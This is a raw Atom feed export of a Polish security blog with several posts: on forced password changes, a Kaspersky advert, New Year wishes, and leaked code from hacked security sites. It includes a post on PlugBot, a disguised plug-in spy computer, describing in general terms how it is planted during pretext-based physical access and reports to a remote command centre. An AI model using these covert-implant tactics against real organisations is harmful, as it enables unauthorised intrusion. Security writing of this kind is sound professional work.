Wygląda więc na to, że okresowe wymuszanie zmiany haseł, tak powszechnie dziś stosowane jako jeden z elementów polityki bezpieczeństwa wielu firm i organizacji, jedynie zmniejsza produktywność użytkowników, zwiększa poziom ich frustracji oraz praktycznie w ogóle nie zwiększa bezpieczeństwa systemów informatycznych! Ponownie okazuje się więc, że faktyczna skuteczność automatycznych mechanizmów mających wymuszać określone zachowania użytkowników jest niewielka.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
Znacznie lepsze efekty przyniosłoby prawdopodobnie odpowiednie wytłumaczenie użytkownikom prawdziwego sensu okresowej zmiany haseł. Być może wtedy zrozumieliby, że zastępowanie hasła &lt;i&gt;jan.kowalski01&lt;/i&gt; frazą &lt;i&gt;jan.kowalski02&lt;/i&gt; podważa sens całej operacji. Być może również przedstawienie oraz zaproponowanie użytkownikom naszych systemów &lt;a href=&quot;http://www.hcsl.pl/2010/11/ciekawy-i-zaskakujaco-bezpieczny-sposob.html&quot;&gt;alternatywnych metod generowania silnych i unikalnych haseł&lt;/a&gt; pozwoliłoby na całkowite wyeliminowanie haseł typu &lt;i&gt;jan.kowalski01&lt;/i&gt;? Wreszcie warto się również zastanowić nad tym, czy uwierzytelnianie oparte o tradycyjne hasła nie powinno już przypadkiem być jedynie reliktem XX wieku?&lt;br /&gt;
&lt;br /&gt;
[&lt;a href=&quot;http://www.cs.unc.edu/~yinqian/papers/PasswordExpire.pdf&quot;&gt;źródło&lt;/a&gt;]&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/4160223969945714191/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/czy-okresowe-wymuszanie-zmiany-hase-ma.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/4160223969945714191'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/4160223969945714191'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/czy-okresowe-wymuszanie-zmiany-hase-ma.html' title='Czy okresowe wymuszanie zmiany haseł ma jakikolwiek sens?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkJulmeR0YD3qItA7cQVZ0ZRmvXVzjvk4r2jxogwmO2YVPNFuaDYGxgCo1IrFLyyHDkALkXlkYnTNIzdxBmxqjnPnmIfvx94ELZwPk-DO54rHhM7rVKaHIq2nlaCgalc6-Giqp6CpuMXn5/s72-c/password.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-940516385492593758</id><published>2011-01-03T00:01:00.001+01:00</published><updated>2011-01-03T00:02:05.659+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><title type='text'>Kaspersky najlepszym antywirusem na świecie?</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/kaspersky-najlepszym-antywirusem-na.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmfuRJylipFm1gxVegpChPq9_AJYYeDI654O48ucX0D0NTCHnwv3sVyHxjucJd0PnNuB_gF_RTWXEsLIk3HEKxxim-EGOaFON0kZQyO7YC1gGAU8AtUqfDpRa0la0Dr9BxQDTldbw6gC0/s1600/Cow.png&quot; /&gt;&lt;/a&gt;Współczesne programy antywirusowe niestety nie są idealne. Nieuchronnie spowalniają działanie naszego systemu, wymagają ciągłych aktualizacji, ich skuteczność nadal &lt;a href=&quot;http://www.hcsl.pl/2010/06/jak-w-banalny-sposob-oszukac-antywirusa.html&quot;&gt;pozostawia wiele do życzenia&lt;/a&gt;, a czasem nawet same &lt;a href=&quot;http://www.hcsl.pl/2009/08/aktualizacje-oprogramowania-grozniejsze.html&quot;&gt;stanowią zagrożenie&lt;/a&gt; o wiele większe od najgroźniejszych wirusów! Niektórych z powyższych wad pozbawione są oczywiście &lt;a href=&quot;http://www.hcsl.pl/2010/10/czym-tak-naprawde-sa-antywirusy-z.html&quot;&gt;programy korzystające z modelu przetwarzania w chmurze&lt;/a&gt;, jednak i tego typu rozwiązania w żadnym razie nie mogą nam obecnie zaoferować stuprocentowo skutecznej ochrony. Dziś dla odmiany, spójrzmy natomiast na rozwiązania antywirusowe oczyma... speców od marketingu zatrudnionych w firmie Kaspersky.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Co jak co, ale pomysłowości firmie Kaspersky nigdy&amp;nbsp;&lt;a href=&quot;http://www.hcsl.pl/2010/02/ciekawy-eksperyment-firmy-kaspersky.html&quot;&gt;nie można było odmówić&lt;/a&gt;, a oto w jaki sposób rosyjski producent zachwala rzekome rozliczne zalety swego antywirusa:&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;object height=&quot;385&quot; width=&quot;640&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/kUvwb-FhW6o?fs=1&amp;amp;hl=pl_PL&amp;amp;rel=0&quot;&gt;



&lt;/param&gt;
&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;



&lt;/param&gt;
&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;



&lt;/param&gt;
&lt;embed src=&quot;http://www.youtube.com/v/kUvwb-FhW6o?fs=1&amp;amp;hl=pl_PL&amp;amp;rel=0&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;640&quot; height=&quot;385&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Moim zdaniem pomysł na powyższą reklamę był naprawdę świetny, a ochrona przed wściekłymi latającymi krowami to cecha naprawdę unikalna. Co ciekawe, spece od marketingu zatrudnieni w firmie Kaspersky muszą sobie świetnie zdawać sprawę z głównych bolączek użytkowników antywirusów, skoro tak bardzo podkreślają właśnie szybkość oraz skuteczność własnego produktu...&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Zdecydowanie Kaspersky jest więc najlepszym antywirusem na świecie, oczywiście w kategorii &lt;i&gt;Najlepsza reklama&lt;/i&gt;. Chyba, że znacie jeszcze lepsze reklamy programów ochronnych?&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/940516385492593758/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/kaspersky-najlepszym-antywirusem-na.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/940516385492593758'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/940516385492593758'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/kaspersky-najlepszym-antywirusem-na.html' title='Kaspersky najlepszym antywirusem na świecie?'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmfuRJylipFm1gxVegpChPq9_AJYYeDI654O48ucX0D0NTCHnwv3sVyHxjucJd0PnNuB_gF_RTWXEsLIk3HEKxxim-EGOaFON0kZQyO7YC1gGAU8AtUqfDpRa0la0Dr9BxQDTldbw6gC0/s72-c/Cow.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-7649004742535059389</id><published>2011-01-02T18:48:00.002+01:00</published><updated>2011-01-02T18:51:01.797+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo sieci komputerowych"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo systemów operacyjnych"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><category scheme="http://www.blogger.com/atom/ns#" term="Testy penetracyjne"/><category scheme="http://www.blogger.com/atom/ns#" term="Wywiad informatyczny"/><category scheme="http://www.blogger.com/atom/ns#" term="Zbieranie informacji"/><title type='text'>Szpiegowskie boty do zadań specjalnych</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/szpiegowskie-boty-do-zadan-specjalnych.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK8WcPmNCO9mqyqaWiXbYSTtSxR_8br1TbUE2y_QB0iX3IN6kr5bazQ9HRpzXR_eE5ZrXCIdgjJVrwCF0zB2dEXXBwueOQmM5dzWNsLqPgSzyaUgNAReZVOXmsbNo7YZBMZ4McpqDumlk/s1600/PlugBot.png&quot; /&gt;&lt;/a&gt;Grupa RedTeam Security od pewnego czasu rozwija bardzo interesujący projekt szpiegowskiego bota do zadań specjalnych. &lt;a href=&quot;http://theplugbot.com/&quot;&gt;PlugBot&lt;/a&gt; to miniaturowy komputer wyposażony w rozmaite przewodowe oraz bezprzewodowe interfejsy sieciowe, pozwalający intruzowi (lub pentesterowi symulującemu przebieg prawdziwego włamania) na długotrwałe utrzymanie dostępu do wewnętrznej infrastruktury informatycznej należącej do docelowej organizacji. Spójrzmy na praktyczne możliwości, potencjalne zastosowania oraz przyszłość PlugBota.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2010/05/jak-dostac-sie-do-serwerowni-na.html&quot;&gt;Zabezpieczenia fizyczne&lt;/a&gt; oraz maksymalne ograniczenie postronnym osobom możliwości nawiązania połączenia z przewodowymi oraz bezprzewodowymi sieciami lokalnymi (prywatnymi) to jedne z najważniejszych fundamentów całego bezpieczeństwa IT. Nawet jeśli w ramach naszej lokalnej (prywatnej) sieci pracują dziurawe serwery oraz stacje robocze, a żaden intruz (lub pentester) nie będzie w stanie w jakikolwiek sposób uzyskać dostępu do samej sieci, to jego działania najprawdopodobniej spełzną na niczym.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Wiedzą o tym oczywiście organizacje zatroskane o swe bezpieczeństwo, które starają się w &lt;a href=&quot;http://www.hcsl.pl/2009/11/w-japonii-powstaa-farba-pochaniajaca.html&quot;&gt;każdy możliwy sposób&lt;/a&gt; ograniczyć obcym dostęp do własnej przewodowej oraz bezprzewodowej sieci. W efekcie tego, w skrajnych przypadkach intruz (pentester) znajdujący się poza obiektami należącymi do danej organizacji nie będzie nawet w zasięgu prywatnej sieci WiFi. Tutaj z pomocą może mu jednak przyjść elektroniczny szpieg, czyli właśnie PlugBot.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfJDAchoavTDs0YGGfSKRs3-ZV3fS1SNWaxdqg22TswCgwlzAfPDX-WdzXXfqPGLLPZduKNmlazfMnLsWyKTIcPa-shhpnGxlg7OglvfehYCx530LDPIF9pzEe-fP0GCdUgg2vmKEteUY/s1600/PlugBot02.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;200&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfJDAchoavTDs0YGGfSKRs3-ZV3fS1SNWaxdqg22TswCgwlzAfPDX-WdzXXfqPGLLPZduKNmlazfMnLsWyKTIcPa-shhpnGxlg7OglvfehYCx530LDPIF9pzEe-fP0GCdUgg2vmKEteUY/s200/PlugBot02.png&quot; width=&quot;139&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
PlugBot to miniaturowy komputer wyposażony w:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Procesor 1.2 Ghz,&lt;/li&gt;
&lt;li&gt;512 MB RAM,&lt;/li&gt;
&lt;li&gt;Bluetooth,&lt;/li&gt;
&lt;li&gt;Wireless 802.11b,&lt;/li&gt;
&lt;li&gt;Gigabit Ethernet,&lt;/li&gt;
&lt;li&gt;Slot MicroSD,&lt;/li&gt;
&lt;li&gt;system Linux, Perl, PHP, MySQL,&lt;/li&gt;
&lt;li&gt;Miniaturową obudowę upodabniającą całe urządzenie do popularnych zasilaczy i ładowarek sieciowych.&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
Wszystko czego musi dokonać w celu instalacji urządzenia intruz lub pentester podczas krótkotrwałego (np. pod pozorem przeglądu klimatyzacji) dostępu do pomieszczeń danej organizacji, to wetknięcie plugbota do dowolnego gniazdka elektrycznego. W efekcie będziemy mieć do czynienia z następującą sytuacją:&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw6oiU6a_DBkYKjR-hdgUe7RzOVHARkyQVh5RKZkSuCWeQx-VlUdpsbi3DqJD4brBkzhu7IzgZu9juiK_6dATxao-4E2W3i2jI7DNIrw9d9tG1CZ2W5bQyW874RPr8SwcjFc1WhGoeOyY/s1600/PlugBot01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;256&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiw6oiU6a_DBkYKjR-hdgUe7RzOVHARkyQVh5RKZkSuCWeQx-VlUdpsbi3DqJD4brBkzhu7IzgZu9juiK_6dATxao-4E2W3i2jI7DNIrw9d9tG1CZ2W5bQyW874RPr8SwcjFc1WhGoeOyY/s400/PlugBot01.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
Ponieważ nasz szpieg znajduje się wewnątrz danej organizacji to prawdopodobnie znajdzie się w zasięgu wewnętrznej sieci lokalnej lub też sieci WiFi. Od teraz PlugBot może więc już (na zlecenie intruza lub pentestera) rozpocząć poszukiwania słabych punktów w zabezpieczeniach za pomocą dowolnych (publicznych lub prywatnych) narzędzi.&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Jeśli tylko sprzętowemu szpiegowi uda się połączyć z jakąś siecią przewodową lub bezprzewodowa, to natychmiast nawiązane zostanie połączenie z uprzednio skonfigurowanym adresem należącym do centrum sterowania (ang. &lt;i&gt;Central Command&lt;/i&gt;) całą operacją. Wszystkie zebrane przez PlugBota wyniki są natomiast wysyłane szyfrowanym połączeniem do centrum składowania danych (ang. &lt;i&gt;Drop Zone&lt;/i&gt;). Oczywiście intruz lub pentester, poprzez centrum sterowania, na bieżąco może śledzić wszystkie wyniki oraz sterować dalszymi poczynaniami szpiega.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Projekt PlugBot jest obecnie nadal w fazie rozwoju. Między innymi rozwijane jest obecnie oprogramowanie mające służyć za centrum sterowania. Jeśli chcielibyście wesprzeć prace nad tym interesującym sprzętowym szpiegiem, możecie po prostu &lt;a href=&quot;http://theplugbot.com/sponsors&quot;&gt;zostać sponsorem projektu&lt;/a&gt;. Ja zaś jestem ciekaw, czy uważacie, że tego typu sprzętowe rozwiązania mają szansę zrewolucjonizować ataki na systemy informatyczne oraz poczciwe testy penetracyjne?&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/7649004742535059389/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/szpiegowskie-boty-do-zadan-specjalnych.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/7649004742535059389'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/7649004742535059389'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/szpiegowskie-boty-do-zadan-specjalnych.html' title='Szpiegowskie boty do zadań specjalnych'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK8WcPmNCO9mqyqaWiXbYSTtSxR_8br1TbUE2y_QB0iX3IN6kr5bazQ9HRpzXR_eE5ZrXCIdgjJVrwCF0zB2dEXXBwueOQmM5dzWNsLqPgSzyaUgNAReZVOXmsbNo7YZBMZ4McpqDumlk/s72-c/PlugBot.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-601374862172448049</id><published>2011-01-01T00:32:00.002+01:00</published><updated>2011-01-01T00:34:26.652+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="HCSL - Newsy"/><category scheme="http://www.blogger.com/atom/ns#" term="Inne"/><category scheme="http://www.blogger.com/atom/ns#" term="Newsy"/><title type='text'>Bezpiecznego Nowego Roku!</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
Bezpiecznego Nowego Roku...&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/bezpiecznego-nowego-roku.html&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;159&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxnduhbWRF482nF11U-EPsG9dpKyX7syp9CMME-OqnubqkWrpY2TeJfEz1MRL6US1N4gjjh0UTJ6MKxa8YxMlbge1WcWCAWfaXJYHaHZaerFtLyorDXIGtoM8RAayQ6PLbUTuDPmStODs/s200/2011.png&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
życzy wszystkim czytelnikom...&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2011/01/bezpiecznego-nowego-roku.html&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;150&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8kAPiJVKVL79V5P_n1Wv5Hqu1y87bpinzVm-yY9IdiY5LCWzYVjalWeaS1Zk3Tm2g-jjL85HODwZzPsF0zmIjjGtsVTMDLLyJTa25EuzzjrKM8icKpkPp1p4tAJizY5IWjS2ZuHYxQCeG/s200/HCSL+logo.png&quot; width=&quot;200&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
W szczególności życzę Wam, by wszystkie ważne łatki zawsze zostały zaaplikowane na czas, by centralne firewalle i systemy anty-X zawsze były w stanie wychwycić wszelkie zagrożenia zanim te dotrą do stacji roboczych i serwerów oraz by brak jakichkolwiek incydentów bezpieczeństwa był zawsze wynikiem... odpowiednio skutecznych zabezpieczeń!&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hcseclab.blogspot.com/feeds/601374862172448049/comments/default' title='Komentarze do posta'/><link rel='replies' type='text/html' href='http://hcseclab.blogspot.com/2011/01/bezpiecznego-nowego-roku.html#comment-form' title='Komentarze (0)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/601374862172448049'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4511012464226103155/posts/default/601374862172448049'/><link rel='alternate' type='text/html' href='http://hcseclab.blogspot.com/2011/01/bezpiecznego-nowego-roku.html' title='Bezpiecznego Nowego Roku!'/><author><name>\m/ojtek</name><uri>http://www.blogger.com/profile/00686678747901186941</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3kPKADUZjOVHLatr652Rn3sSYbK4nJahwcOl4VKk7SqP2zGIxUqZnxpvl45cvn_NGlAw7lyEV4CDIE58SyCxwGnRy1rEZNCjgKWu5NO0BCnsw-9s3cNevdmM3puj1RJ4/s220/P1010377.JPG'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxnduhbWRF482nF11U-EPsG9dpKyX7syp9CMME-OqnubqkWrpY2TeJfEz1MRL6US1N4gjjh0UTJ6MKxa8YxMlbge1WcWCAWfaXJYHaHZaerFtLyorDXIGtoM8RAayQ6PLbUTuDPmStODs/s72-c/2011.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4511012464226103155.post-1389772686804395276</id><published>2010-12-26T16:17:00.011+01:00</published><updated>2010-12-26T17:20:58.639+01:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo aplikacji"/><category scheme="http://www.blogger.com/atom/ns#" term="Bezpieczeństwo danych"/><category scheme="http://www.blogger.com/atom/ns#" term="Obrona - Atak"/><title type='text'>Zależność haseł od tematyki serwisu internetowego</title><content type='html'>&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;a href=&quot;http://www.hcsl.pl/2010/12/zaleznosc-hase-od-tematyki-serwisu.html&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 0em; margin-right: 0em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGYVIjW0BgWylhK94P9KL2ALP8lMPvqg6OhkGWJbM-nY4qKjWV6DGV_1L6Tf0_uYM7ACfldJNs9NS-7cVCgcbtVMZx0-zG6yhXcK-OTG_ylzVEaMsE4BKV7SqV3iQ4Ifrkd6dCZq_B5pw/s1600/firmaJP.png&quot; /&gt;&lt;/a&gt;Czy istnieje serwis internetowy całkowicie odporny na wszelkie próby naruszenie jego bezpieczeństwa? Oczywiście nie. W ciągu ostatnich dni przekonali się o tym m.in. administratorzy bardzo popularnych serwisów (&lt;a href=&quot;http://www.exploit-db.com/owned-and-exposed/&quot;&gt;exploit-db.com&lt;/a&gt;, &lt;a href=&quot;http://www.backtrack-linux.org/backtrack/backtrack-blog-compromised/&quot;&gt;backtrack-linux.org&lt;/a&gt;, &lt;a href=&quot;http://free-hack.com/&quot;&gt;free-hack.com&lt;/a&gt;) poświęconych tematyce bezpieczeństwa, które zostały skutecznie zaatakowane. Szczegóły dotyczące poszczególnych ataków zostały upublicznione w drugim wydaniu &lt;a href=&quot;http://www.exploit-db.com/papers/15823/&quot;&gt;[EZINE] Owned and Exposed&lt;/a&gt;. Wszystkich zainteresowanych szczegółami zachęcam do powyższej lektury, my natomiast zajmiemy się dzisiaj tematem nieco odmiennym.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
Analizując informacje opublikowane na temat skutecznych ataków na wspomniane znane serwisy internetowe związane z tematyką bezpieczeństwa informatycznego i hackingu, możemy natrafić na wiele bardzo interesujących informacji. Intrygujący jest przykładowo fakt zbierania i rejestrowania adresów IP należących do internautów odwiedzających serwis backtrack-linux.org:&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;code&gt;&lt;/code&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;br /&gt;
&lt;code&gt;// DO NOT CHANGE THIS FILE WITHOUT TALKING TO MUTS FIRST&amp;gt; EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!!&lt;/code&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: monospace;&quot;&gt;function getRealIpAddr()&lt;/span&gt;&lt;br /&gt;
&lt;code&gt;{&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;if (!empty($_SERVER[&#39;HTTP_CLIENT_IP&#39;])) &amp;nbsp; //check ip from share internet&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;{&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;$ip=$_SERVER[&#39;HTTP_CLIENT_IP&#39;];&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;}&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;elseif (!empty($_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;])) &amp;nbsp; //to check ip is pass from proxy&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;{&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;$ip=$_SERVER[&#39;HTTP_X_FORWARDED_FOR&#39;];&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;}&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;else&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;{&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp; &amp;nbsp;$ip=$_SERVER[&#39;REMOTE_ADDR&#39;];&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;}&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;return $ip;&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;}&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Poza tym&amp;nbsp;happy ninjas twierdzą, że niemożliwe jest skuteczne zabezpieczenie systemu (&lt;s&gt;Linuksa?&lt;/s&gt;&amp;nbsp;FreeBSD? Systemu Carders.cc?) zawierającego... backdoora:&lt;br /&gt;
&lt;blockquote&gt;
